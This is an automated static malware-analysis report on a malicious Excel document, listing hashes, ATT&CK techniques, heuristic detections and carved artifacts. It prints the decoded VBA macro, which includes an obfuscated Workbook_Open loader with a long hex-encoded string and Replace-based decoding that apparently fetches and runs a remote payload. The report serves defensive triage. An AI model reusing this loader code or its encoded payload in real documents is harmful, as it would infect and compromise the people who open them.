Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 574b59dc1edfd81d…

MALICIOUS

Office (OOXML)

62.7 KB Created: 2004-08-16 18:44:14 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2020-09-15
MD5: f743ef79b812d3133a9374bd472e0362 SHA-1: c3755a19e92751ae231c70936a0cb930735bab34 SHA-256: 574b59dc1edfd81da481081c8a8eeae2f3f9c62965a25ef4ab67aacbd4ce63fa
212 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer

The file is a malicious Excel document containing an obfuscated VBA macro loader within the Workbook_Open event. This macro is designed to execute code via CreateObject, likely to download and run a secondary payload. No specific family could be identified, and the embedded URLs were confirmed benign.

Heuristics 8

  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • External hyperlinks (1) low OOXML_EXTERNAL_HYPERLINKS
    Document contains 1 external hyperlink — clickable URLs are stored as external relationships. First target: https://www.vertex42.com/ExcelTemplates/quote-template.html
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://www.vertex42.com/ExcelTemplates/quote-template.html Document hyperlink
    • https://www.vertex42.com/licensing/EULA_privateuse.htmlDocument hyperlink
    • https://www.vertex42.com/ExcelArticles/invoicing.htmlDocument hyperlink

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 10406 bytes
SHA-256: db3e3f12813c702e7c2f6919a9494b6d36d3f266e748fb6a0dae71ec4e9ba828
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Function LPuhk(GmTeWCTGbDFcIzusfbqLy, bDkpSSm, JERtqhdchpekWLICVxxxvIFKY)
TAuA = "OJNODtBhNhQv"
TVUpfAzGUoWOhzFdQVRHrHnjirODd = "UuTMOPgeUtAE"
VrAVuwExLyoqMhkGnlvdJUbuVlqwlBYGnMSsiWU = 4.79204328967529E+26
LPuhk "ZOIwfWCiw"
End Function

Sub nHIpzOGyttzVZbWeuzOprStFJWeeTrrCZv(gHEakBQGAIGHLKahCzOsYR, oEvLfOzjHANVQBMbQ, bVLBRCxVyTCTDAOqQVpplsBZy, xpKgqXxQw, FmnsNJPfgowNGZkqmbqjUmDKFILSdeVnDSldiwbc, VtJKjikvzkWZNbTjdmFxxCBSIJ)
oqvWKHcaqdRfWaXHTuUwVNCgdkbfBCxveeinycDiO = "DbsqHDvjXHFybanOtafxYngVBsskIqqlicKbnm"
XjReppgCIzjicDQUPvWpPLLbg = "UQyQMbHyHOGIrfUpj"
YIOhRIufQwMLYqyYVPErmIbdvCNGErUa = "aCYCmyqVgKKmwqQKSKFksxQgk"
PunbZclkxnZViRNVGyRrzMxvlgPpjcmrS = 7.56389786646568E+29
jviF = 3.66643497618003E+18
iALsckwcnXWrRPsnDxrptMvAUBhDiiSn = 8.73568241534631E+34
Njqn = "VLpEbSNkUcZMfxqPrV"
LXaCtuF = "irEgCAj"
End Sub

Function tngdGoHnlJYXMQxcoIPwkxiQqFU(gAokdmkhFeVCUxlVNlbvuIvKW, ftPwXMvVJOClbY, txPYDjlFjSQYohYFeOPHqRJGJGznWSbKDI, KglT)
gNYsukNClfzUyLCNuEymKYWXWWtw = "PmBTbGX"
fcbCurIIuxYvVWmHhVIrAWYqRxVtyBXE = "cOcXkQhNPcZVAjsAtlFyfkJEkkw"
PJsZUQtHKkxEaeluyVRO = 3.20720923727035E+27
sFPRGzsFXmzTMxFjzBkqkqJnBY = "yOFO"
tngdGoHnlJYXMQxcoIPwkxiQqFU "isWEdHOQACmxylOgfLz"
End Function

Function FyXwkvdIWtNNJybvzqrKUrTAfqYgBafhztDBrENeLn(gYsCwcQiytqRXflUaBF, nTpiDLpPJUTDGtnJzUIArfRHLUZSzuFdFIhMi, zlmAYeamLesb, GtEAHCiWilWQPOpyxMab, UWOqHnhYJvaXZzkAIaKAnQzQkJPkoNRRAgl, qJzOBxZpvspPFyplPaAEW)
wBrorKUbKNMdOfWRuWxG = "NfOQuZEucMyhVWyoBhWhyUUnPpWUnTHOgYiWdYwkQ"
iANvsIYcspbZytLbAFDjGJEkBwncL = 2.85658817393385E+34
klRRmTZUwNwKaSmHapKCXrggaY = "ctwUvRPEpHhHrBfIqnvimyuWyRJFtElqNYxaAsAt"
NwztiTAriqsf = "JezZWeIKLlWqtTEFIxnCXYBvcQyINKOsLWOS"
aVWkABLcCoAwmasFcTkcExGfA = "AWefWEldhcQSWWqSabxMakWmjDdqXdPqkDAoxXSvK"
sQoJwOmlXfi = "WQArwTbuGEMaiSVBUCJCBRrFxZGPElGkIv"
koFayUQCoDObeskQUVgnFYuuXMMqU = 8.26566512405928E+41
cSmllMObKhlODCjxcWTVmObIbLtLDmIZipawpsGYBs = "yCrUsLZkpXzM"
FyXwkvdIWtNNJybvzqrKUrTAfqYgBafhztDBrENeLn "qdKZTDXYZLfNbm"
End Function

Private Sub Workbook_Open()
Dim vbChMnJWt As String

vbChMnJWt = iDNVWZmIY(vvrDhhKbP(iDNVWZmIY("B4E2D605F67734E234B627378634E234B6C6C602422494C655B475B69625D372A2E2A2D2548572E22734E234B607C6163634E234B68272A2E2A2D272C272947292B3023716C602C6975426747585D62702422494C655B475B69625B3728262827434D472B27202A275D2F4A29272B20272E434E234B647E272B2727534E234B62672B27234C69672B27234E234B6E6479272B272E244F67772B272E6C672B272F6164672B2726496C672B27234E234B682727285E2856537A3F2F257E24734E234B6B6E696B6E296F6F2B4E2D605B6659355E24787477272C24234E234B6E667A34734E234B6D607B27272C57272B27272E6C464955586A62645E234E234B68734E234B672729272C7C6975426747585D627B3023747162747D20727F63634E234B63737824234E234B6E667A34734E234B6D607B272C572B272E6C464955586A62645E234E234B68734E234B67292")))
vbChMnJWt = GwhjNkxjC(vbChMnJWt, "X.XV", "http")
vbChMnJWt = GwhjNkxjC(vbChMnJWt, "C.Ck", "e")
vbChMnJWt = GwhjNkxjC(vbChMnJWt, "K.mP", "P")
xbKKpkzmO (vbChMnJWt)
End Sub

Sub lwqlOIyxFDDesjvFDChplOuglDyDLYOOIIOKeJi(kQvUtDdGjr, AeCSB, dMFLhhEyUmYqLGQYQzYcfSKNXbiRCtV, KwjOgxCiq, ZQEQXklcNCuYELCsnGyn, aQRfPXBrTxqmJstIHDygafTMlsYMnKvkCayzmkIN, kuEDmuSIkfDAHUvxFuWypDIBFjiuuVX)
vZtmAeJVndrrohIXCJzLKvlhooWjUlatTktMUIfGt = "QigWaaArIUKXlAoMxMIaACDyY"
owCues = 7460513
ifDARNvjdcFivztYI = 5.69756586273522E+31
TyTbNeiyXmD = "OqRFDVkLfyMrXZxPcEuYtjKuxHRYRTqJfnOP"
pwYnxeVlcDohTVTrf = 8.49905619392754E+22
efXIvDMuMHDLkKixmHWkvFpIUEcqxyXSzqkjuhAUa = 8479652875#
SNiRSe = "WiLUuAYpOnrbVwOklLtZyDEHBJsncaDlxrbPMxEpLug"
JtFGEdxFYFASdDSlIlNnjFdeVyXnHENEXKyIEmj = 8.06947642985545E+22
dyMsqIlIeThagsKDQakFFJxUrwvTFKgVBOJksknNNPI = 797642263
WnXezusdBetUAsBuMSDTnLYSjaKfnXsqAK = 6.01905581409253E+41
End Sub

Function DBfpxCKVnaLYIDbEwYZFNXuUyz(EYRTKSCUXUpjAjsAuLozLOEuZkMqdlCTquwWuysBkr, xtqJ, vWxeMKmqTWtaFMqlSW
... (truncated)
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 45056 bytes
SHA-256: bed2e39fc0fa0957ac93d9c92e6d44916b57774d0f3ebe530b09c516524b0329
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).

Open this report in the interactive analyzer, or submit your own file for analysis.